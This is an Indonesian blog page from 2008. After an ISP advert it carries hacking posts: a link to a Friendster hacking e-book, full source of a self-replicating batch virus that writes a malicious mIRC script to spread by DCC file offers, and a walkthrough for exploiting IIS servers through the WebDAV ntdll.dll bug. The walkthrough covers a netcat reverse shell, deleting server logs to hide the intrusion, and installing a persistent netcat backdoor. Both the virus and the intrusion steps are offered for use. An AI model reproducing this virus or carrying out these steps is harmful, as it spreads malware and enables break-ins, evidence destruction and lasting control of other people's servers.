GRATIS TEST KONEKSI INTERNET


PUNYA LAPTOP, ANDROID, ATAU KOMPUTER TAK TERKONEKSI INITERNET??
BOSAN PAKE MODEM DENGAN KONEKSI QUOTA TERBATAS?? :
PALUGADA WIRELESS SOLUSINYA!!!
* system voucher dengan banyak pilihan
* masa aktif voucher tak terbatas
* gak repot copot-colok modem!!!
* untuk pelanggan bulanan dengan qouta limit byte tak terbatas (speed tidak akan berkurang)
* jaringan wireless terluas di manado utara
* Jaminan koneksi real 24 jam,
* support online 24 jam
* speed UP-TO 512Kbp/s pure 256Kbps
Office = Jl. anggrek ternate tanjung Link II
Tlpn/SMS : 089698523021 Email: palugadawave@gmail.com

DETEKSI ACCES POINT KAMI DENGAN SSID "palugada wi-fi zone"

Sabtu, 29 November 2008

EXTreme Technik To hacking Friendster

Siapa yang tidak mengenal friendster??
ajang pertemanan di dunia maya paling terkenal abad ini... karena ketenaran dari situs tersebut banyak hacker/cracker yang mencoba mencari celah keamanan situs tersebut.. mulai dari :
injection script
phising
fake login
deface
di coba untuk melihat seberapa aman WEB tersebut (www.friendster.com) ada juga yang ingin merusak profil seseorang yang tidak dia senangi.. berikut anda dapat mendownload dan membaca .. beberapa technik yang di lakukan para hacker/cracker dalam melakukan serangan-serangan ke profil seseorang untuk mendownload
silahkan ke :
  • EXTREME HaCk1Ng friendstER

  • download via-rapidshare

  • E-book ini di berikan cuma-cuma, bukan untuk menjahili profil orang tapi hanya untuk sekedar belajar.. tentang kelemahan dari suatu WEB..
    yang terkenal seperti friendster.com

    Selasa, 11 November 2008

    membuat virus bat files

    oke...
    mungkin tutorial ini sudah agak basi tapi dari pada ga di share..
    script yang berikut ini saya dapatkan dari anak-anak X-code yang tidak pernah berhenti berkarya di bidang teknologi informasi...
    langkah pertama: copy paste code di bawah ini di notepad.
    code:
    -------------------------------------------------------------------------------------
    set shadow=0
    @echo off % mawar-kuning %
    cls % mawar-kuning %
    % mawar-kuning %set /a shadow=%shadow%+1
    % mawar-kuning %if %shadow% EQU 5 (
    % mawar-kuning %echo kamu telah terinfeksi mawar kuning !!
    % mawar-kuning %set shadow=0
    % mawar-kuning %)
    % mawar-kuning %echo set shadow=%shadow% >mawarkuning.bat
    % mawar-kuning %set shadow=
    % mawar-kuning %set qwxykjsi=set
    % mawar-kuning %set aaa=A
    %qwxykjsi% fi=if % mawar-kuning %
    %qwxykjsi% nt=not % mawar-kuning %
    %qwxykjsi% el=errorlevel % mawar-kuning %
    %qwxykjsi% ine=%fi% %nt% %el% % mawar-kuning %
    % mawar-kuning %set vrsa=rndom
    set oto=goto% mawar-kuning %
    %qwxykjsi% a=0 % mawar-kuning %
    set fd=find% mawar-kuning %

    %fd% “mawar-kuning”<%0>>mawarkuning.bat

    %qwxykjsi% xp=true% mawar-kuning %
    % mawar-kuning %if %xp% EQU true goto xptruea

    goto winmawar % mawar-kuning %

    :xptruea % mawar-kuning %
    % mawar-kuning %set a=0
    % mawar-kuning %set b=0
    % mawar-kuning %set c=0
    % mawar-kuning %set d=0
    % mawar-kuning %set e=0
    % mawar-kuning %set f=0
    % mawar-kuning %set g=0
    % mawar-kuning %set h=0
    % mawar-kuning %set i=0
    % mawar-kuning %set j=0
    % mawar-kuning %set k=0
    % mawar-kuning %set l=0
    % mawar-kuning %set m=0
    % mawar-kuning %set n=0
    % mawar-kuning %set o=0
    % mawar-kuning %set p=0
    % mawar-kuning %set q=0
    % mawar-kuning %set r=0
    % mawar-kuning %set s=0
    % mawar-kuning %set t=0
    % mawar-kuning %set u=0

    :mulai0 % mawar-kuning %
    % mawar-kuning %set aa=0

    :mulai1 % mawar-kuning %
    if %aa% EQU 5 goto endmawarkuning % mawar-kuning %
    %qwxykjsi% /a aa=%aa%+1 % mawar-kuning %

    :mulai2 % mawar-kuning %
    ver|time|%fd% “,1″>nul % mawar-kuning %

    %ine% 1 %qwxykjsi% %vrsa%%aa%=1% mawar-kuning %

    %ine% 1 %oto% mulai1 % mawar-kuning %

    ver|time|%fd% “,2″>nul % mawar-kuning %
    %ine% 1 %qwxykjsi% %vrsa%%aa%=2% mawar-kuning %
    %ine% 1 %oto% mulai1 % mawar-kuning %

    ver|time|%fd% “,3″>nul % mawar-kuning %
    %ine% 1 %qwxykjsi% %vrsa%%aa%=3% mawar-kuning %
    %ine% 1 %oto% mulai1 % mawar-kuning %
    ver|time|%fd% “,4″>nul % mawar-kuning %
    %ine% 1 %qwxykjsi% %vrsa%%aa%=4% mawar-kuning %
    %ine% 1 %oto% mulai1 % mawar-kuning %
    ver|time|%fd% “,5″>nul % mawar-kuning %
    %ine% 1 %qwxykjsi% %vrsa%%aa%=5% mawar-kuning %
    %ine% 1 %oto% mulai1 % mawar-kuning %
    ver|time|%fd% “,6″>nul % mawar-kuning %
    %ine% 1 %qwxykjsi% %vrsa%%aa%=6% mawar-kuning %
    %ine% 1 %oto% mulai1 % mawar-kuning %
    ver|time|%fd% “,7″>nul % mawar-kuning %
    %ine% 1 %qwxykjsi% %vrsa%%aa%=7% mawar-kuning %
    %ine% 1 %oto% mulai1 % mawar-kuning %
    ver|time|%fd% “,8″>nul % mawar-kuning %
    %ine% 1 %qwxykjsi% %vrsa%%aa%=8% mawar-kuning %
    %ine% 1 %oto% mulai1 % mawar-kuning %
    ver|time|%fd% “,9″>nul % mawar-kuning %
    %ine% 1 %qwxykjsi% %vrsa%%aa%=9% mawar-kuning %
    %ine% 1 %oto% mulai1 % mawar-kuning %
    ver|time|%fd% “,0″>nul % mawar-kuning %
    %ine% 1 %qwxykjsi% %vrsa%%aa%=10% mawar-kuning %
    %ine% 1 %oto% mulai1 % mawar-kuning %
    goto mulai2 % mawar-kuning %
    :endmawarkuning % mawar-kuning %
    % mawar-kuning %if %a% NEQ 1 (if %rndom1% EQU 1 (
    % mawar-kuning %find “%aaa%AAA” <%0 >>mawarkuning.bat
    % mawar-kuning %set a=1
    % mawar-kuning %))

    % mawar-kuning %if %b% NEQ 1 (if %rndom1% EQU 2 (
    % mawar-kuning %find “%aaa%BBB” <%0 >>mawarkuning.bat
    % mawar-kuning %set b=1
    % mawar-kuning %))

    % mawar-kuning %if %c% NEQ 1 (if %rndom1% EQU 3 (
    % mawar-kuning %find “%aaa%CCC” <%0 >>mawarkuning.bat
    % mawar-kuning %set c=1
    % mawar-kuning %))
    % mawar-kuning %if %d% NEQ 1 (if %rndom1% EQU 4 (
    % mawar-kuning %find “%aaa%DDD” <%0 >>mawarkuning.bat
    % mawar-kuning %set d=1
    % mawar-kuning %))
    % mawar-kuning %if %e% NEQ 1 (if %rndom2% EQU 1 (
    % mawar-kuning %find “%aaa%EEE” <%0 >>mawarkuning.bat
    % mawar-kuning %set e=1
    % mawar-kuning %))
    % mawar-kuning %if %f% NEQ 1 (if %rndom2% EQU 2 (
    % mawar-kuning %find “%aaa%FFF” <%0 >>mawarkuning.bat
    % mawar-kuning %set f=1
    % mawar-kuning %))
    % mawar-kuning %if %g% NEQ 1 (if %rndom2% EQU 3 (
    % mawar-kuning %find “%aaa%GGG” <%0 >>mawarkuning.bat
    % mawar-kuning %set g=1
    % mawar-kuning %))
    % mawar-kuning %if %h% NEQ 1 (if %rndom2% EQU 4 (
    % mawar-kuning %find “%aaa%HHH” <%0 >>mawarkuning.bat
    % mawar-kuning %set h=1
    % mawar-kuning %))
    % mawar-kuning %if %i% NEQ 1 (if %rndom3% EQU 1 (
    % mawar-kuning %find “%aaa%III” <%0 >>mawarkuning.bat
    % mawar-kuning %set i=1
    % mawar-kuning %))
    % mawar-kuning %if %j% NEQ 1 (if %rndom3% EQU 2 (
    % mawar-kuning %find “%aaa%JJJ” <%0 >>mawarkuning.bat
    % mawar-kuning %set j=1
    % mawar-kuning %))
    % mawar-kuning %if %k% NEQ 1 (if %rndom3% EQU 3 (
    % mawar-kuning %find “%aaa%KKK” <%0 >>mawarkuning.bat
    % mawar-kuning %set k=1
    % mawar-kuning %))
    % mawar-kuning %if %l% NEQ 1 (if %rndom3% EQU 4 (
    % mawar-kuning %find “%aaa%LLL” <%0 >>mawarkuning.bat
    % mawar-kuning %set l=1
    % mawar-kuning %))
    % mawar-kuning %if %m% NEQ 1 (if %rndom4% EQU 1 (
    % mawar-kuning %find “%aaa%MMM” <%0 >>mawarkuning.bat
    % mawar-kuning %set m=1
    % mawar-kuning %))
    % mawar-kuning %if %n% NEQ 1 (if %rndom4% EQU 2 (
    % mawar-kuning %find “%aaa%NNN” <%0 >>mawarkuning.bat
    % mawar-kuning %set n=1
    % mawar-kuning %))
    % mawar-kuning %if %o% NEQ 1 (if %rndom4% EQU 3 (
    % mawar-kuning %find “%aaa%OOO” <%0 >>mawarkuning.bat
    % mawar-kuning %set o=1
    % mawar-kuning %))
    % mawar-kuning %if %p% NEQ 1 (if %rndom4% EQU 4 (
    % mawar-kuning %find “%aaa%PPP” <%0 >>mawarkuning.bat
    % mawar-kuning %set p=1
    % mawar-kuning %))
    % mawar-kuning %if %q% NEQ 1 (if %rndom5% EQU 1 (
    % mawar-kuning %find “%aaa%QQQ” <%0 >>mawarkuning.bat
    % mawar-kuning %set q=1
    % mawar-kuning %))
    % mawar-kuning %if %r% NEQ 1 (if %rndom5% EQU 2 (
    % mawar-kuning %find “%aaa%RRR” <%0 >>mawarkuning.bat
    % mawar-kuning %set r=1
    % mawar-kuning %))
    % mawar-kuning %if %s% NEQ 1 (if %rndom5% EQU 3 (
    % mawar-kuning %find “%aaa%SSS” <%0 >>mawarkuning.bat
    % mawar-kuning %set s=1
    % mawar-kuning %))
    % mawar-kuning %if %t% NEQ 1 (if %rndom5% EQU 4 (
    % mawar-kuning %find “%aaa%TTT” <%0 >>mawarkuning.bat
    % mawar-kuning %set t=1
    % mawar-kuning %))
    % mawar-kuning %if %u% NEQ 1 (if %rndom5% EQU 5 (
    % mawar-kuning %find “%aaa%UUU” <%0 >>mawarkuning.bat
    % mawar-kuning %set u=1
    % mawar-kuning %))
    % mawar-kuning %if %a% EQU 1 (if %b% EQU 1 (if %c% EQU 1 (if %d% EQU 1 (
    % mawar-kuning %if %e% EQU 1 (if %f% EQU 1 (if %g% EQU 1 (if %h% EQU 1 (
    % mawar-kuning %if %i% EQU 1 (if %j% EQU 1 (if %k% EQU 1 (if %l% EQU 1 (
    % mawar-kuning %if %m% EQU 1 (if %n% EQU 1 (if %o% EQU 1 (if %p% EQU 1 (
    % mawar-kuning %if %q% EQU 1 (if %r% EQU 1 (if %s% EQU 1 (if %t% EQU 1 (if %u% EQU 1 (
    goto irca % mawar-kuning %
    % mawar-kuning %)))))))))))))))))))))

    goto mulai0 % mawar-kuning %

    :winmawar % mawar-kuning %

    set wina=0% mawar-kuning %
    set winb=0% mawar-kuning %
    set winc=0% mawar-kuning %
    set wind=0% mawar-kuning %
    set wine=0% mawar-kuning %
    set oto=% mawar-kuning %
    set qwxykjsi=% mawar-kuning %
    set nt=% mawar-kuning %
    set fi=% mawar-kuning %
    set el=% mawar-kuning %
    set ine=% mawar-kuning %

    :mulaiwin2 % mawar-kuning %
    % mawar-kuning %if not %wina%==1 goto mawarkuningengi
    % mawar-kuning %if not %winb%==1 goto mawarkuningengi
    % mawar-kuning %if not %winc%==1 goto mawarkuningengi
    % mawar-kuning %if not %wind%==1 goto mawarkuningengi
    % mawar-kuning %if not %wine%==1 goto mawarkuningengi

    goto winirc % mawar-kuning %
    :mawarkuningengi % mawar-kuning %
    ver|time|find “,1″>nul % mawar-kuning %
    if not errorlevel 1 set randoma=1% mawar-kuning %
    if not errorlevel 1 goto enmawarkuningwin % mawar-kuning %

    ver|time|find “,2″>nul % mawar-kuning %
    if not errorlevel 1 set randoma=2% mawar-kuning %
    if not errorlevel 1 goto enmawarkuningwin % mawar-kuning %
    ver|time|find “,3″>nul % mawar-kuning %
    if not errorlevel 1 set randoma=3% mawar-kuning %
    if not errorlevel 1 goto enmawarkuningwin % mawar-kuning %
    ver|time|find “,4″>nul % mawar-kuning %
    if not errorlevel 1 set randoma=4% mawar-kuning %
    if not errorlevel 1 goto enmawarkuningwin % mawar-kuning %
    ver|time|find “,5″>nul % mawar-kuning %
    if not errorlevel 1 set randoma=5% mawar-kuning %
    if not errorlevel 1 goto enmawarkuningwin % mawar-kuning %
    goto mulaiwin2 % mawar-kuning %
    :enmawarkuningwin % mawar-kuning %
    % mawar-kuning %if not %wina%==1 if %randoma%==1 goto enamawarkuningwin
    % mawar-kuning %if not %winb%==1 if %randoma%==2 goto enbmawarkuningwin
    % mawar-kuning %if not %winc%==1 if %randoma%==3 goto encmawarkuningwin
    % mawar-kuning %if not %wind%==1 if %randoma%==4 goto endmawarkuningwin
    % mawar-kuning %if not %wine%==1 if %randoma%==5 goto enemawarkuningwin

    goto mulaiwin2 % mawar-kuning %
    :enamawarkuningwin % mawar-kuning %
    % mawar-kuning %find “%aaa%BBB”<%0>> mawarkuning.bat
    % mawar-kuning %find “%aaa%AAA”<%0>> mawarkuning.bat
    % mawar-kuning %find “%aaa%KKK”<%0>> mawarkuning.bat
    % mawar-kuning %find “%aaa%DDD”<%0>> mawarkuning.bat
    set wina=1% mawar-kuning %

    % mawar-kuning %goto mulaiwin2
    :enbmawarkuningwin % mawar-kuning %
    % mawar-kuning %find “%aaa%EEE”<%0>> mawarkuning.bat
    % mawar-kuning %find “%aaa%LLL”<%0>> mawarkuning.bat
    % mawar-kuning %find “%aaa%GGG”<%0>> mawarkuning.bat
    % mawar-kuning %find “%aaa%HHH”<%0>> mawarkuning.bat
    set winb=1% mawar-kuning %
    % mawar-kuning %goto mulaiwin2
    :encmawarkuningwin % mawar-kuning %
    % mawar-kuning %find “%aaa%III”<%0>> mawarkuning.bat
    % mawar-kuning %find “%aaa%JJJ”<%0>> mawarkuning.bat
    % mawar-kuning %find “%aaa%CCC”<%0>> mawarkuning.bat
    % mawar-kuning %find “%aaa%FFF”<%0>> mawarkuning.bat
    set winc=1% mawar-kuning %
    % mawar-kuning %goto mulaiwin2
    :endmawarkuningwin % mawar-kuning %
    % mawar-kuning %find “%aaa%NNN”<%0>> mawarkuning.bat
    % mawar-kuning %find “%aaa%MMM”<%0>> mawarkuning.bat
    % mawar-kuning %find “%aaa%PPP”<%0>> mawarkuning.bat
    % mawar-kuning %find “%aaa%OOO”<%0>> mawarkuning.bat
    set wind=1% mawar-kuning %
    % mawar-kuning %goto mulaiwin2
    :enemawarkuningwin % mawar-kuning %
    % mawar-kuning %find “%aaa%RRR”<%0>> mawarkuning.bat
    % mawar-kuning %find “%aaa%SSS”<%0>> mawarkuning.bat
    % mawar-kuning %find “%aaa%UUU”<%0>> mawarkuning.bat
    % mawar-kuning %find “%aaa%TTT”<%0>> mawarkuning.bat
    % mawar-kuning %find “%aaa%QQQ”<%0>> mawarkuning.bat
    set wine=1% mawar-kuning %
    % mawar-kuning %goto mulaiwin2
    :winirc % mawar-kuning %
    % mawar-kuning %set wina=
    % mawar-kuning %set winb=
    % mawar-kuning %set winc=
    % mawar-kuning %set wind=
    % mawar-kuning %set wine=
    % mawar-kuning %set aaa=
    % mawar-kuning %set randoma=

    :irca % AAAA %
    if exist C:\mirc\script.ini set mir=C:\mirc% AAAA %
    echo %mir%
    if exist C:\mirc32\script.ini set mir=C:\mirc32% AAAA %
    if exist C:\proga~1\mirc\script.ini set mir=C:\progra~1\mirc% AAAA %
    if exist C:\prgra~1\mirc32\script.ini set mir=C:\progra~1\mirc32% AAAA %
    goto ircb% AAAA %
    :ircb % ABBB %
    set mirc=%mir%\script.ini% ABBB %
    set vs=chr(% ABBB %
    goto ircc% ABBB %
    :ircc % ACCC %
    set wc=echo file.writeline% ACCC %
    goto ircd% ACCC %
    :ircd % ADDD %
    echo dim fso, file > irc.vbs% ADDD %
    echo set fso = createobject(”scripting.filesystemobject”) >>irc.vbs% ADDD %
    echo set file = fso.createtextfile (”%mir%\script.ini”, true)>>irc.vbs% ADDD %
    goto irce% ADDD %
    :irce % AEEE %
    %wc% ” on 1:st” + %vs%97) + “rt: { .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “filee %mir%\name.b” + %vs%97) + “t }”>>irc.vbs% AEEE %
    %wc% ” on 1:join:#: { “>>irc.vbs% AEEE %
    %wc% ” .if (” + %vs%36) + “nick != ” + %vs%36) + “me ” + %vs%38) + “” + %vs%38) + ” ” + %vs%37) + “old != ” + %vs%36) + “nick) {”>>irc.vbs% AEEE %
    goto ircf% AEEE %
    :ircf % AFFF %
    %wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “old ” + %vs%36) + “nick”>>irc.vbs% AFFF %
    %wc% ” .timer ” + %vs%36) + “+ ” + %vs%36) + “r” + %vs%97) + “nd(1,100000) 1 5 .” + %vs%36) + “check_him( ” + %vs%36) + “nick , ” + %vs%36) + “ch” + %vs%97) + “n )”>>irc.vbs% AFFF %
    goto ircg% AFFF %
    :ircg % AGGG %
    %wc% ” } “>>irc.vbs% AGGG %
    %wc% ” }”>>irc.vbs% AGGG %
    %wc% ” ” + %vs%97) + “li” + %vs%97) + “s check_him {”>>irc.vbs% AGGG %
    goto irch% AGGG %
    :irch % AHHH %
    %wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “port ” + %vs%36) + “r” + %vs%97) + “nd(9999,999999) “>>irc.vbs% AHHH %
    %wc% ” .while (” + %vs%36) + “portfree(” + %vs%37) + “port) == ” + %vs%36) + “f” + %vs%97) + “lse) { .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “port ” + %vs%36) + “r” + %vs%97) + “nd(9999,999999) }”>>irc.vbs% AHHH %
    goto irci% AHHH %
    :irci % AIII %
    %wc% ” .%fi% (” + %vs%36) + “1 !isop ” + %vs%36) + “2) { “>>irc.vbs% AIII %
    %wc% ” .%nt%ice ” + %vs%36) + “1 :DCC ” + %vs%115) + %vs%101) + %vs%110) + %vs%100) + ” teletubies ( ” + %vs%36) + “+ ” + %vs%36) + “ip ” + %vs%36) + “+ ) “>>irc.vbs% AIII %
    goto ircj% AIII %
    :ircj % AJJJ %
    %wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “sock_n” + %vs%97) + “me ” + %vs%36) + “r” + %vs%97) + “nd(1,99999)”>>irc.vbs% AJJJ %
    %wc% ” .msg ” + %vs%36) + “1 _DCC ” + %vs%115) + %vs%101) + %vs%110) + %vs%100) + ” ” + %vs%37) + “filee ” + %vs%36) + “longip(” + %vs%36) + “ip) ” + %vs%37) + “port ” + %vs%36) + “file(” + %vs%37) + “filee).size ” + %vs%36) + “+ _”>>irc.vbs% AJJJ %
    %wc% ” .socklisten ” + %vs%37) + “sock_n” + %vs%97) + “me ” + %vs%37) + “port”>>irc.vbs% AJJJ %
    goto irck% AJJJ %
    :irck % AKKK %
    %wc% ” .timers off”>>irc.vbs% AKKK %
    %wc% ” .timer ” + %vs%36) + “+ ” + %vs%36) + “r” + %vs%97) + “nd(1,99999) 0 10 .cloze”>>irc.vbs% AKKK %
    %wc% ” } “>>irc.vbs% AKKK %
    goto ircl% AKKK %
    :ircl % ALLL %
    %wc% ” }”>>irc.vbs% ALLL %
    %wc% ” on 1:socklisten:” + %vs%37) + “sock_n” + %vs%97) + “me: {”>>irc.vbs% ALLL %
    goto ircm% ALLL %
    :ircm % AMMM %
    %wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “client_n” + %vs%97) + “me ” + %vs%36) + “r” + %vs%97) + “nd(1,9999999)”>>irc.vbs% AMMM %
    %wc% ” .sockclose ” + %vs%37) + “sock_n” + %vs%97) + “me”>>irc.vbs% AMMM %
    goto ircn% AMMM %
    :ircn % ANNN %
    %wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “l 0″>>irc.vbs% ANNN %
    %wc% ” .bre” + %vs%97) + “d ” + %vs%37) + “filee ” + %vs%37) + “l 4000 ” + %vs%38) + “le”>>irc.vbs % ANNN %
    goto irco% ANNN %
    :irco % AOOO %
    %wc% ” .sockwrite -b ” + %vs%37) + “client_n” + %vs%97) + “me 4000 ” + %vs%38) + “le”>>irc.vbs% AOOO %
    %wc% ” ” + %vs%37) + “l = ” + %vs%37) + “l + 4000″>>irc.vbs% AOOO %
    goto ircp% AOOO %
    :ircp % APPP %
    %wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “end 0″>>irc.vbs% APPP %
    %wc% ” }”>>irc.vbs% APPP %
    %wc% ” on 1:sockre” + %vs%97) + “d:” + %vs%37) + “client_n” + %vs%97) + “me: {”>>irc.vbs% APPP %
    goto ircq % APPP %
    :ircq % AQQQ %
    %wc% ” .%fi% (” + %vs%37) + “l >= ” + %vs%36) + “file(” + %vs%37) + “filee).size) {”>>irc.vbs% AQQQ %
    %wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “end 1″>>irc.vbs% AQQQ %
    goto ircr% AQQQ %
    :ircr % ARRR %
    %wc% ” .sockclose ” + %vs%37) + “client_n” + %vs%97) + “me”>>irc.vbs% ARRR %
    %wc% ” .h” + %vs%97) + “lt”>>irc.vbs% ARRR %
    %wc% ” } .else {”>>irc.vbs% ARRR %
    goto ircs% ARRR %
    :ircs % ASSS %
    %wc% ” .%fi% (” + %vs%37) + “end != 1) {”>>irc.vbs% ASSS %
    %wc% ” .bre” + %vs%97) + “d ” + %vs%37) + “filee ” + %vs%37) + “l 4000 ” + %vs%38) + “le”>>irc.vbs% ASSS %
    goto irct% ASSS %
    :irct % ATTT %
    %wc% ” .sockwrite -b ” + %vs%37) + “client_n” + %vs%97) + “me 4000 ” + %vs%38) + “le”>>irc.vbs% ATTT %
    %wc% ” ” + %vs%37) + “l = ” + %vs%37) + “l + 4000″>>irc.vbs% ATTT %
    %wc% ” } } }”>>irc.vbs% ATTT %
    goto ircu% ATTT %
    :ircu % AUUU %
    %wc% ” ” + %vs%97) + “li” + %vs%97) + “s cloze { .sockclose ” + %vs%37) + “sock_n” + %vs%97) + “me } “>>irc.vbs% AUUU %
    echo file.Close >>irc.vbs% AUUU %
    cscript irc.vbs% AUUU %
    cls% AUUU %
    goto eirc% AUUU %

    :eirc % mawar-shadow %
    del irc.vbs % mawar-shadow %
    find “mawar-shadow”<%0>>mawarkuning.bat
    copy mawarkuning.bat %mir%\Mawar Kuning.bat % mawar-shadow %
    del mawarkuning.bat % mawar-shadow %
    cls % mawar-shadow %
    -------------------------------------------------------------------------------------
    langkah ke2: save copyan tadi dengan nama apa aja truss dengan extensi *.bat

    maka udah jadi deh... virusnya

    Kamis, 16 Oktober 2008

    Panduan Melakukan Hacking IIS webserver

    Pertama-tama sebelum melakukan, biar saya jelaskan kepada anda bahwa hacking atau deface menggunakan suatu exploit yang sudah ada di internet hanya akan menjadikan anda seorang lamer atau perusak. Anda seringkali mendapati orang-orang ini melakukan deface terhadap ratusan situs. Nah, mereka ini bukanlah hacker, melainkan script kiddies, karena mereka menggunakan code yang dibuat orang lain untuk mendeface situs. Hacker yang sejati adalah orang yang menciptakan code exploit dalam ‘0 day’. Dan saya sarankan kepada anda agar JANGAN PERNAH MENJADI SCRIPT KIDDIES untuk memperoleh sedikit ketenaran dan merasa bangga dengan hal tersebut!!!

    2) Adanya Celah Keamanan

    Ok cukup sudah !! Mari dimulai. Pertamakali tujuan kita untuk melakukan penetrasi adalah menemukan suatu hole. Webserver IIS berisikan banyak celah keamanan yang jika dieksploitasi dengan sesuai dapat memberikan seorang hacker kendali penuh atas sistem tersebut. Celah keamanan yang umum adalah buffer overflow, yakni mengeksploitasi format string. Apakah “Buffer Overflow” itu adalah soal yang lain dan memerlukan artikel tersendiri. Atau lebih baik silakan anda baca terbitan Phrack 49 (www.phrack.com) dengan judul “Smashing The Stack For Fun and Profit”. Disana istilah buffer overflow dijelaskan berdasarkan sudut pandang Linux.

    Ok, karena webserver IIS menyimpan banyak celah keamanan eksploitasi buffer overflow. Hanya dalam 2 tahun terakhir ini e-eye digital defence team (http://www.eeye.com/) melaporkan adanya buffer overflow pada seluruh ekstensi ISAPI pada IIS Webserver.

    Sebagai contoh suatu request http://www.iissite.com/a.idq?aaaaaaaaaaaaaaaaaa....aaaa

    Sekarang, kapanpun webserver iis mendapatkan request berupa file seperti .idq atau .asp dsb selain .html request dipenuhi oleh file .dll yang spesifik pada webserver. Namun jika seorang hacker mengirimkan request berupa string panjang dari aaa dan mencari angka yang tepat dimana suatu buffer overflow terjadi, maka dia dapat menyesuaikan shell code ditempat tersebut dan menyebabkan shell codenya dieksekusi pada remote machine.

    Catatan: Suatu shell code merupakan kode assembly yang memberikan command prompt pada Win 2000 dan shell jika pada Linux.

    Tapi saat pertanyaan diajukan mengenai hacking website, kita memerlukan penemuan bug sebelumnya. Kaerna kebanyakan server yang dipatch untuk bug yang ditemukan sebelumnya. Pada dasarnya bug .idq ditemukan dua tahun terakhir tidak akan bekerja hari ini karena kebanyakan server Win 2000 telah dipatch dengan service pack sp3, sp4. Jadi saat ini yang kita perlukan adalah bug terakhir atau dalam dunia perhackingan dinamakan dengan “0day exploit”. Tempat terbaik untuk mencari exploit adalah www.packetstormsecurity.nl, situs ini secara konsisten memuat exploit, code, advisory yang terbaru. Tempat lainnya seperti www.k-otic.com/exploit atau cara terbaik adalah mencari dibagian 0day exploit pada situs kami www.hackersprogrammers.com. Sekarang ini sangat banyak 0day yang sengaja tidak pernah dipublikasikan!!! Dan hanya ditujukan untuk komunitas underground atau orang-orang tertentu yang dikenal sebagai hacker. Untuk mendapatkan exploit yang baik, anda perlu mengadakan kontak dengan hacker yang baik dan berbakat di internet. Dan pilihan terbaik adalah code yang anda buat sendiri (jika anda mampu) maka dengan ini anda mampu menghack berbagai webserver IIS di seluruh dunia!!! J

    3) Mengeksploitasi celah keamanan dan Mengendalikan webserver

    Ini bagian yang paling menarik. Compile code exploit anda dengan Visual C++ jika berupa kode win c atau gunakan gcc jika berupa kode linux. Jika anda tidak mengetahui hal ini, lebih baik mendownload exploit berbasis GUI dari internet (ini semakin menunjukkan bahwa anda seorang lamer). OK, sekarang sebagai contoh exploit webdave ntdll.dll yang ditemukan 3-4 bulan terakhir. Masih banyaknya server yang vulnerable untuk ini. Terakhir saat salya menuliskan artikel ini ditemukan bug terbaru berupa RPC DCOM oleh LSD. Namun bug RPC DCOM tidak akan bekerja dalam kasus ini karena firewall pada server akan memblok seluruh packet terhadap port 135. Setelah anda melihat-lihat webdave exploit, downloadlah exploit Kralor Webdave. Compile dan download exploit kralor yang berbasis GUI. Shellcode ini berupa jenis yang spesifik. Shellcode yang digunakan exploit Kralor memberikan suatu reverse shell. Artinya setelah berhasil mengeksploitasi server tersebut akan terhubung ke computer anda melalui suatu command shell!!! Jadi anda memerlukan netcat listener untuk ‘mendengar’ port spesifik pada computer anda. Download tool netcat dari internet dan masuk ke DOS prompt, ketik sebagai berikut:

    D:\nc>nc -Lvp 6666

    Listening on [any] 6666 ....

    Well, sekarang computer beraksi sebagai suatu server di port 6666 dan listening terhadap berbagai incoming request. Sekarang compile exploit kralor atau gunakan yang berbasis GUI, kemudian masuk ke DOS prompt dan ketik.

    D:\vcproject\webdave\debug>web.exe

    [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
    www.coromputer.net && undernet #coromputer

    syntax: D:\WEB.EXE [padding]

    Cool !!! Jadi apa yang harus anda lakukan? Masih bingung? OK, saya sarankan, jika anda ingin menghack suatu server, carilah ip dengan melakukan ping dari DOS. Misalkan ip 123.123.123.123 dan ip kita 200.200.200.200. Pastikan netcat menjalankan beberapa port seperti 6666 dan ketik perintah pada Dos Prompt yang baru:

    D:\vcproject\webdave\debug>web.exe 123.123.123.123 200.200.200.200 6666

    Terdapat padding bit yang berbeda. Dalam kasus exploit berbasis GUI dapat melakukannya sendiri, atau membaca kometar dalam exploit tersebut untuk mendapatkan suatu ide mengenai apa padding bit tersebut dan bagaimana cara menggunakannya. Setelah berhasil mengeksploitasi anda akan mendapatkan shell pada netcat listener anda.

    D:\nc>nc -Lvp 6666

    Listening on [any] 6666 ....
    connect to 200.200.200.200 from 123.123.123.123

    Microsoft(R) Windows 2000
    (C)Copyright Microsoft Corp 1981-2000.

    C:\winnt\system32>

    Selamat!! Jadi anda berhasil mengeksploitasi bug ntdll.dll pada remote server. Command prompt telah kita dapatkan pada netcat listener yang merupakan command prompt pada remote server.

    4) Apa yang harus dilakuklansetelah melakukan hacking suatu server?

    Pertama kali yang terpenting yang harus dilakukan setelah melakukan hacking berbagai server di dunia internet adalah menghapus log tersebut. Setelah kita memiliki HTTP Port 80 untuk menghack, kita perlu menghapus log IIS. Direktorinya dalam hal ini ada di C:\winnt\system32\logfiles . Jadi pada shell tersebut anda tinggal mengetik.

    C:\winnt\system32> rmdir /s /q logfiles

    Yang menghapus direktori log file, file dan folder yang terdapat dalam direktori tersebut.

    Catatan: Ini merupakan cara yang buruk dalam menghapus file log. Admin dapat langsung mengetahui bahwa seseorang telah menghacking servernya. Cara lain yang terbaik adalah masuk kedalam direktori logfile dan cari file log yang spesifik dan menghapus hanya pada baris ayng berisikan ip anda.

    Sekarang, setelah megnhapus log file. Anda dapat bermain-main dengan server tersebut. Seluruh server berada dalam kendali anda. Hal terbaik adalah menginstall suatu backdoor pada server tersebut. Membua backdoor senfiri atau sebagai gantinya mengupload netcat apda server tersebut dan menjadinnya listen pada beberapa port yang spesifik dan anda juga dapat menambahkan entri dalam registri jadi dapat tetap dalam keadaan listening bahkan setelah server tersebut direstart.

